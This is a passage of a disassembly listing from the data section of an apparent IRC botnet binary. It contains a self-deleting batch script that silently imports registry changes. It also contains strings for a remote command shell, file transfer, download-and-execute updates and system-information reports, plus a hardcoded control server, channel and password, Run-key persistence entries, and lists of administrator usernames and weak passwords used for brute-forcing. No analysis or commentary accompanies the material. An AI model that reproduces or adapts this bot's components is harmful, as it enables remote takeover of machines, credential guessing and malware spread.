db 'Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg',0Dh,0Ah
db 'Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg',0Dh,0Ah
db 'Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,'
db '00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\'
db '1.reg',0Dh,0Ah
db 'Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\'
db '1.reg',0Dh,0Ah
db 'Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SackOpts"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg',0Dh,0Ah
db 'Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersio'
db 'n\Internet Settings]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg',0Dh,0Ah
db 'Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'START /WAIT REGEDIT /S %temp%\1.reg',0Dh,0Ah
db 'DEL %temp%\1.reg',0Dh,0Ah
db 'DEL %0',0Dh,0Ah,0
align 10h
unk_42B3F0 db 2 ; DATA XREF: sub_409FB2:loc_40A083�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aNotSupportedBy db ' Not supported by this system.',0
align 8
unk_42B438 db 2 ; DATA XREF: sub_409FB2:loc_40A051�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToAlloca db ' Unable to allocation ARP cache.',0
align 4
unk_42B47C db 2 ; DATA XREF: sub_409FB2:loc_40A007�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheIsEmpt db ' ARP cache is empty.',0
align 8
unk_42B4B8 db 2 ; DATA XREF: sub_409FB2+45�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorGettingAr db ' Error getting ARP cache: <%d>.',0
align 4
unk_42B4FC db 2 ; DATA XREF: sub_40A133+13C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 69h, 6Eh, 67h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedSendin db ' Finished sending pings to %s.',0
align 4
unk_42B53C db 2 ; DATA XREF: sub_40A133+6E�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 69h, 6Eh, 67h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPi db ' Error sending pings to %s.',0
align 4
dword_42B578 dd 28026502h, 62302E31h, 20282029h, 2E706475h, 1F641F6Dh
; DATA XREF: sub_40A2BF+1C7�o
dd 2029206Ch, 2BBBB02h
aFinishedSend_0 db ' Finished sending packets to %s.',0
align 4
dword_42B5B8 dd 28026502h, 62302E31h, 20282029h, 2E706475h, 1F641F6Dh
; DATA XREF: sub_40A2BF+8E�o
dd 2029206Ch, 2BBBB02h
aErrorSending_1 db ' Error sending pings to %s.',0
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40A53E+33�o
align 8
dword_42B608 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40A5C5:loc_40A6F7�o
dd 2029206Ch, 2BBBB02h
aCouldNotReadDa db ' Could not read data from proccess.',0Dh,0Ah,0
align 4
dword_42B64C dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40A5C5+10F�o
dd 2029206Ch, 2BBBB02h
aProccessHasTer db ' Proccess has terminated.',0Dh,0Ah,0
align 4
dword_42B688 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40A5C5:loc_40A6AB�o
dd 2029206Ch, 2BBBB02h
aCouldNotRead_0 db ' Could not read data from proccess',0Dh,0Ah,0
align 10h
dword_42B6D0 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40A71A+194�o
dd 2029206Ch, 2BBBB02h
aFailedToStartI db ' Failed to start IO thread, error: <%d>.',0
align 4
dword_42B718 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40A71A+14C�o
dd 2029206Ch, 2BBBB02h
aRemoteCommandP db ' Remote Command Prompt',0
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40A71A+21�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_40A8CF+39�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_40A9D8+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_40A9D8+192�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_40A9D8:loc_40AB3C�o
align 4
word_42B85C dw 3Fh ; DATA XREF: sub_40A9D8:loc_40AADA�r
; sub_40C18B+1F�o
align 10h
dword_42B860 dd 28207325h, 297325hdword_42B868 dd 3F3F3Fh ; .text:loc_41418C�o
a2003 db '2003',0 ; DATA XREF: sub_40A9D8+BA�o
; .text:0042C4EC�o ...
align 4
aXp db 'XP',0 ; DATA XREF: sub_40A9D8+AA�o
; .text:00414177�o ...
align 4
a2k db '2K',0 ; DATA XREF: sub_40A9D8+98�o
; .text:00414167�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_40A9D8+7E�o
; .text:0041414E�o
align 10h
a98 db '98',0 ; DATA XREF: sub_40A9D8+6C�o
; .text:0041413E�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_40A9D8+5A�o
; .text:0041412E�o
align 4
a95 db '95',0 ; DATA XREF: sub_40A9D8+46�o
; .text:00414120�o
align 4
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_40AC8C+AB�o
align 4
off_42B8CC dd offset loc_412F4E ; DATA XREF: sub_40AC8C:loc_40AD00�o
dword_42B8D0 dd 4E414Ch dword_42B8D4 dd 6C616944h, 70752Dhdword_42B8DC dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h, 0unk_42B8F0 db 2 ; DATA XREF: sub_40AD52:loc_40AF0F�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToConnec db 'Failed to connect to HTTP server.',0
align 4
unk_42B934 db 2 ; DATA XREF: sub_40AD52:loc_40AF08�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCouldNotOpenAC db 'Could not open a connection.',0
align 4
dword_42B974 dd 28026502h, 62302E31h, 20282029h, 69736976h, 1F6D2E74h
; DATA XREF: sub_40AD52+1A6�o
dd 206C1F64h, 0BB022029h, 202002BBh, 61766E49h, 2064696Ch
dd 2E4C5255h, 2 dup(0)
unk_42B9A8 db 2 ; DATA XREF: sub_40AD52:loc_40AEEB�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToGetReq db 'Failed to get requested URL from HTTP server.',0
align 4
dword_42B9F8 dd 28026502h, 62302E31h, 20282029h, 69736976h, 1F6D2E74h
; DATA XREF: sub_40AD52+192�o
dd 206C1F64h, 0BB022029h, 202002BBh, 204C5255h, 69736976h
dd 2E646574h, 0
dword_42BA28 dd 2A2F2Ah dword_42BA2C dd 202E6425h, 3D207325h, 732520hdword_42BA38 dd 6C415B2Dh, 20736169h, 7473694Ch, 2D5Dha_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_40B078+60�o
align 4
dword_42BA6C dd 2C353103h, 6E653431h, 6230317Ah, 2E320320h, 3103202Eh
; DATA XREF: sub_40B118+1A�o
dd 6F6C2835h, 32037367h, 3531032Eh, 29646F6Dh, 0BB320320h
dd 20353103h, 656C4320h, 64657261h, 2Eh
dword_42BAA4 dd 28026502h, 62302E31h, 20282029h, 2E676F6Ch, 1F641F6Dh
; DATA XREF: sub_40B18A+DC�o
dd 2029206Ch, 2BBBB02h, 694C2020h, 63207473h, 6C706D6Fh
dd 2E657465h, 0
dword_42BAD4 dd 28026502h, 62302E31h, 20282029h, 2E676F6Ch, 1F641F6Dh
; DATA XREF: sub_40B18A+3F�o
dd 2029206Ch, 2BBBB02h, 65422020h, 6E6967h
dword_42BAF8 dd 80000002h off_42BAFC dd offset aSoftwareMicr_0 ; DATA XREF: sub_40B2B9+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 42C360h, 80000001h, 42C398h
dword_42BB10 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B459+170�o
dd 2029206Ch, 2BBBB02h
aFailedToSendTo db ' Failed to send to Remote command shell.',0
align 4
dword_42BB58 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B459+AB�o
dd 2029206Ch, 2BBBB02h
aFailedToOpenRe db ' Failed to open remote command shell.',0
align 4
dword_42BB9C dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B459+47�o
; sub_40B61A+FD�o
dd 2029206Ch, 2BBBB02h
aFailedToOpenSo db ' Failed to open socket.',0
align 4
dword_42BBD4 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+362�o
; sub_40B9BC+156�o
dd 2029206Ch, 2BBBB02h, 6F532020h, 74656B63h, 72726520h
dd 2E726Fh
dword_42BC00 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+2FA�o
dd 2029206Ch, 2BBBB02h
aTransferComple db ' Transfer complete to IP: %s, Filename: %s (%s bytes).',0
dword_42BC54 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+202�o
dd 2029206Ch, 2BBBB02h
aUnableToOpenSo db ' Unable to open socket.',0
align 4
dword_42BC8C dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+1CB�o
dd 2029206Ch, 2BBBB02h, 65532020h, 7420646Eh, 6F656D69h
dd 2E7475h
dword_42BCB8 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_40B61A+16A�o
dd 169h
dword_42BCD0 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+127�o
dd 2029206Ch, 2BBBB02h
aFileDoesnTExis db ' File doesn',27h,'t exist.',0
align 4
dword_42BD04 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+82�o
dd 2029206Ch, 2BBBB02h
aFailedToBindTo db ' Failed to bind to socket.',0
dword_42BD3C dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B61A+44�o
dd 2029206Ch, 2BBBB02h
aFailedToCreate db ' Failed to create socket.',0
align 8
dword_42BD78 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B9BC+1CF�o
dd 2029206Ch, 2BBBB02h
aTransferComp_0 db ' Transfer complete from IP: %s, Filename: %s (%s bytes).',0
align 10h
dword_42BDD0 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B9BC+CB�o
dd 2029206Ch, 2BBBB02h
aErrorOpeningSo db ' Error opening socket.',0
dword_42BE04 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B9BC+AB�o
dd 2029206Ch, 2BBBB02h
aErrorOpeningFi db ' Error opening file for writing.',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_40B9BC+97�o
dword_42BE48 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40B9BC+83�o
dd 2029206Ch, 2BBBB02h
aErrorUnableToW db ' Error unable to write file to disk.',0
align 4
unk_42BE8C db 2 ; DATA XREF: sub_40BBF7+480�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 10h
unk_42BED0 db 2 ; DATA XREF: sub_40BBF7+472�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
align 10h
unk_42BF20 db 2 ; DATA XREF: sub_40BBF7+3B6�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
dword_42BF74 dd 28026502h, 62302E31h, 20282029h, 6E776F64h, 64616F6Ch
; DATA XREF: sub_40BBF7+34D�o
dd 641F6D2Eh, 29206C1Fh, 0BBBB0220h, 4F202002h, 656E6570h
dd 25203A64h, 2E73h
aOpen db 'open',0 ; DATA XREF: sub_40BBF7+32B�o
; sub_40CD3A+297B�o ...
align 10h
unk_42BFB0 db 2 ; DATA XREF: sub_40BBF7+2D6�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 4
unk_42BFFC db 2 ; DATA XREF: sub_40BBF7+257�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCrcFailedDD_ db ' CRC Failed (%d != %d).',0
align 4
unk_42C038 db 2 ; DATA XREF: sub_40BBF7+1CD�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 10h
unk_42C080 db 2 ; DATA XREF: sub_40BBF7:loc_40BD8F�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 8
unk_42C0C8 db 2 ; DATA XREF: sub_40BBF7+191�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 4
unk_42C114 db 2 ; DATA XREF: sub_40BBF7+77�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_40C18B:loc_40C1CE�o
; sub_4134AF+104�o ...
aInvalid db 'Invalid',0 ; DATA XREF: sub_40C18B:loc_40C1C8�o
aDisk db 'Disk',0 ; DATA XREF: sub_40C18B:loc_40C1C2�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_40C18B:loc_40C1BC�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_40C18B:loc_40C1B6�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_40C18B:loc_40C1B0�o
aFailed db 'failed',0 ; DATA XREF: sub_40C21C:loc_40C2F4�o
; sub_40C337+3B�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_40C21C+6B�o
align 10h
dword_42C190 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40C337+8E�o
dd 2029206Ch, 2BBBB02h
aSDriveSSTotalS db ' %s Drive (%s): %s total, %s free, %s available.',0
align 10h
dword_42C1E0 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40C337+58�o
dd 2029206Ch, 2BBBB02h
aSDriveSFailedT db ' %s Drive (%s): Failed to stat, device not ready.',0
align 10h
aA_1 db 'A:\',0 ; DATA XREF: sub_40C409:loc_40C44E�o
align 8
dword_42C238 dd 1B58h ; sub_40C574+451�r
dword_42C23C dd 1A0Bh dword_42C240 dd 1AA6h dword_42C244 dd 0CCEh ; sub_40CD3A+4E09�r
dword_42C248 dd 158Dh ; sub_40CD3A:loc_411C34�r
dword_42C24C dd 1 dword_42C250 dd 1 dword_42C254 dd 1 ; sub_40C574:loc_40C89E�r
byte_42C258 db 78h ; DATA XREF: sub_40C0D6:loc_40C0E2�r
; sub_40CD3A+A99�r ...
align 4
dword_42C25C dd 7 ; sub_413F42+51�r ...
dword_42C260 dd 1 ; sub_40CD3A+26E�r ...
aIds99 db 'ids99',0 ; DATA XREF: sub_40C574+67�o
; sub_40CD3A+3C7B�o ...
align 4
aEnz999_9b db 'enz 999.9b',0 ; DATA XREF: sub_40CD3A:loc_4126FC�o
align 4
aHi db 'hi',0 ; DATA XREF: sub_40CD3A+5B32�o
; sub_40CD3A+5BF5�o
align 4
aDd_leetz_info db 'dd.leetz.info',0 ; DATA XREF: sub_40C574+389�o
; sub_40C574+442�o
align 4
aDd_0 db '#dd',0 ; DATA XREF: sub_40C574+3AA�o
; sub_40C574+458�o
aDpass db 'dpass',0 ; DATA XREF: sub_40C574+3C1�o
; sub_40C574+46A�o
align 4
byte_42C298 db 64h ; DATA XREF: sub_40C574:loc_40C9F4�r
; sub_40C574+48E�o
db 64h, 2Eh, 6Ch
dd 7A746565h, 666E692Eh, 6Fh
dword_42C2A8 dd 646423h aDpass_0 db 'dpass',0 ; DATA XREF: sub_40C574+4B6�o
align 4
byte_42C2B4 db 6Ch ; DATA XREF: sub_40282F+84�o
; sub_403166+F�o ...
db 6Eh, 74h, 65h
dd 74656E72h, 6578652Eh, 0
dword_42C2C4 dd 65746E6Ch, 74656E72h, 642E3233h, 6C6Chdword_42C2D4 dd 69706F54h, 6E6C2063h, 6E726574h, 7465hdword_42C2E4 dd 54484848h, 2Dh, 65746E6Ch, 74656E72h, 6578652Eh, 0
; DATA XREF: sub_413F42+12�o
dword_42C2FC dd 692Bh dword_42C300 dd 66666623h, 0 ; sub_40CD3A+4C6E�o
dword_42C308 dd 66666623h, 0 dword_42C310 dd 66666623h, 0 a78789 db '78789',0 ; DATA XREF: sub_40282F+9A�o
align 10h
aDd db 'dd',0 ; DATA XREF: sub_40282F+95�o
align 4
aDd_ db 'dd.',0 ; DATA XREF: sub_40282F+90�o
off_42C328 dd offset a@room ; DATA XREF: sub_40CD3A+5B95�r
; "*@room"
off_42C32C dd offset aMirc1_7_99 ; DATA XREF: sub_40CD3A+87D�r
; "mirc 1.7.99"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .text:off_42BAFC�o
align 10h
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_414500+28�o
; sub_414826+28�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_414500+D4�o
; sub_414826+D4�o
align 4
dd offset aAdministrator ; "Administrator"
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
dd offset aUser_0 ; "USER"
dd offset aAs ; "as"
dd offset asc_43362C ; "x"
dd offset aZ_1 ; "z"
dd offset aA_2 ; "a"
align 10h
off_42C440 dd offset byte_43B658 ; DATA XREF: sub_404EC7:loc_404F57�r
; sub_404EC7+9C�o
dd offset a@_11 ; "!@#$"
dd offset a@_10 ; "!@#$%"
dd offset a@_9 ; "!@#$%^"
dd offset a@_8 ; "!@#$%^&"
dd offset a@_7 ; "!@#$%^&*"
dd offset asc_4335F4 ; "%"
dd offset dword_42645C
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset a00000000 ; "00000000"
dd offset a007 ; "007"
dd offset a0wn3d ; "0wn3d"
dd offset a0wned ; "0wned"
dd offset a1 ; "1"
dd offset a110 ; "110"
dd offset a111 ; "111"
dd offset a111111 ; "111111"
dd offset a11111111 ; "11111111"
dd offset a12 ; "12"
dd offset a121 ; "121"
dd offset a121212 ; "121212"
dd offset a123 ; "123"
dd offset a123123 ; "123123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a12346 ; "12346"
dd offset a123467 ; "123467"
dd offset a1234678 ; "1234678"
dd offset a12346789 ; "12346789"
dd offset a123467890 ; "123467890"
dd offset a1234qwer ; "1234qwer"
dd offset a123abc ; "123abc"
dd offset a123asd ; "123asd"
dd offset a123qwe ; "123qwe"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2600 ; "2600"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a88888888 ; "88888888"
dd offset aAdmin_0 ; "Admin"
dd offset aAdministrado_0 ; "Administrador"
